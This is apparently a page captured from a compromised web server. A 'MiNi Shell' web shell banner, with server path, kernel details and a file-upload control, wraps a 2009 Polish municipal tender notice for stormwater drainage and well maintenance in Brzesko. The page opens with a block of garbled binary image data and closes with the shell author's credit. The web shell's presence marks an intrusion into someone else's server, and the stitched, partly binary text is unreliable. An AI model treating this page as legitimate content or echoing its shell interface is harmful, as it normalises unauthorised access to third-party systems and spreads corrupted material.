JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090119/20859-N-2009.html

<p class="kh_header"><b>Brzesko: Bieżące utrzymanie urządzeń i sieci kanalizacji opadowej oraz studni publicznych na terenie gminy Brzesko, usuwanie awarii</b><br>
<b>Numer ogłoszenia: 20859 - 2009; data zamieszczenia: 19.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Brzeska , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie, tel. 0-14 68 63 100, faks 0-14 66 305 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.brzesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie urządzeń i sieci kanalizacji opadowej oraz studni publicznych na terenie gminy Brzesko, usuwanie awarii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zadania - miasto i gmina Brzesko
I/ Bieżące utrzymanie urządzeń i sieci kanalizacji opadowej na terenie gminy Brzeska, usuwanie awarii  obejmuje czynności mające na celu zmniejszenie zużycia sieci burzowej i jej urządzeń, umożliwiające normalne użytkowanie sieci, a w szczególności;
	a) wiosenne czyszczenie 400 sztuk kratek ściekowych wraz z 		unieszkodliwieniem osadów (IV,V/09 r.),
	b) czyszczenie 100 mb przykanalików O 200 (wykonanie jw),
	c) czyszczenie osadnika otwartego o kubaturze 10 m3 przy ul. Stawowej 	oraz 
              o kubaturze 2,5 m3 przy  ul.Piastowskiej, Kopernika i Dworcowej wraz z   
             odwozem  osadu, czyszczenie przepustów do O 60: trzy razy w roku (IV,VIII i 
             X/09 r.)
	    - ul. Bernackiego plus osadnik 1m3,
   - ul. Brzegowa
	d) czyszczenie krat na rowie (wlot kanalizacji burz.) przy ul. Świerkowej
	 i ul. Kopernika (wykonanie jw),
	e) usuwanie  awarii - obejmujące czynności, które mają na celu 		doprowadzenie do stanu należytego uszkodzonych elementów sieci 		burzowej i przywracają pierwotną użyteczność sieci a w szczególności:
 	wymianę uszkodzonych elementów (nakrywy, przyłącza, kratki, wpusty) oraz rurociągu  konserwowanej sieci burzowej,
 	2   -
            f) monitorowanie stanu  technicznego oraz wykonanie prac porządkowych w 	 obrębie wylotów do Uszwicy - kanalizacji opadowej ul. Przemysłowa, 		Głowackiego, Wąska(V, X/09 r.)  wykoszenie w m-cu sierpniu dojścia do   
            wylotów ul. Głowackiego i Wąskiej.


II/ Bieżące utrzymanie studni publicznych na terenie gminy Brzesko,
w tym:

a) wiosenne uruchomienie 14 szt studni (pompy) polegające na dwukrotnym przechorowaniu wody w studniach oraz przepompowaniu wody,sprawdzenie odprowadzenia do kanalizacji wody z kratek usytuowanych przy studniach(IV,V/09 r.) 
b) sezonowa kontrola (monitoring sprawności 1 x w m-cu),
c) zimowa konserwacja (XI/09 r. zabezpieczenie pomp przed rozmrożeniem)
d) doraźne remonty studni, których celem jest wymiana poszczególnych części albo całości urządzeń pompujących.
e) renowacja  3 szt studni kopanych polegająca na wyczyszczeniu dna
    studni i wypełnieniu warstwą żwiru filtracyjnego.
III/ Wykonawca zobowiązany jest do wykonania inwentaryzacji powykonawczej w przypadku przepięcia elementów kanalizacji opadowej.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.30-2, 65.00.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent zapewni jako część swojej oferty wadium w wysokości; 
2.000,00 PLN ( słownie : dwa tysiące złotych 00/100 PLN ) .
Zgodnie z art. 45 PZP oraz pkt 8 SIWZ.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem udziału w postępowaniu jest;
        a) być uprawnionym do występowania w obrocie prawnym zgodnie z wymogami   
           ustawowymi,
b) posiadać niezbędną wiedzę i doświadczenie, potencjał ekonomiczny i techniczny oraz personel, wystarczające do wykonania zamówienia,
c) nie podlegać wykluczeniu z postępowania na podstawie art.24, ustawy Pzp,
d) wykonywać w okresie ostatnich trzech lat terminowo i dobrze zlecenia (roboty na sieciach kanalizacyjnych,
         e)  złożenie oferty, wpłacenie wadium
Ocena polega m.in. na sprawdzeniu:
czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona /za zgodność/ przez osoby uprawnione lub pełnomocnictwa udzielonego przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk ZP-14 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu;

1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

2)	wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia jako nadzór, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności;


2a) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 2, wykonawca wskazał osoby, którymi będzie dysponował;
3)	dokumentów stwierdzających, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia (dla osoby kierującej wymagane uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i urządzeń wod.-kan.);

4)	wykazu wykonanych w ciągu ostatnich trzech lat podobnych prac z podaniem ich wartości, dat wykonania oraz odbiorców (roboty na sieciach kanalizacyjnych).
     Minimalna wartość robót w wymienionych przez Wykonawcę latach, w
     wybranym przez niego roku, winna wynosić 100 tys.zł

5)	wykazu niezbędnych do wykonania zamówienia urządzeń i sprzętu, którymi dysponuje lub będzie dysponował wykonawca, jako minimum przyjmuje się:
      - koparko-spycharka,
      - sam.skrzyniowy 5t,
      - pompę spalinową,
      - kompresor z młotem,
      - samochód WUKO

5a) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa 
w pkt 5 wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
	
6)	oświadczenie o akceptacji umowy, oraz że Oferent zapoznał się z warunkami przetargu i przyjmuje je  bez zastrzeżeń,
7)	 dowód wpłacenia wadium;
8)	wypełniony formularz cenowy stanowiący załącznik Nr 6/A i 6/B
9)	 Oświadczenia w trybie art. 22 ustawy Pzp - załącznik Nr 1 SIWZ.
10)	Oświadczenia w trybie art. 24 ustawy Pzp - załącznik Nr 2 SIWZ.
11)	Oświadczenia uzupełniającego w zależności od statusu prawnego Oferenta w trybie art. 24 ust. 1 pkt 4-9 ustawy Pzp - załącznik Nr 3 SIWZ.
12)	Oświadczenie o akceptacji projektu umowy na takich warunkach jak we wzorze umowy stanowiącym załącznik NR 5 SIWZ  - załącznik Nr 4 SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.brzesko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brzesku 32-800 Brzesko ul. Głowackiego 51, pokój nr 112, 
telefon 0-14 68 63 100 wew. 124, w dniach pracy w godz. od 7:30 do 15:30
e-mail; beata.pajor@um.brzesko.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2009 godzina 10:00, miejsce: Urząd Miejski w Brzesku, ul. Głowackiego 51, 32-800 Brzesko - Sekretariat Burmistrza Brzeska, pokój 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com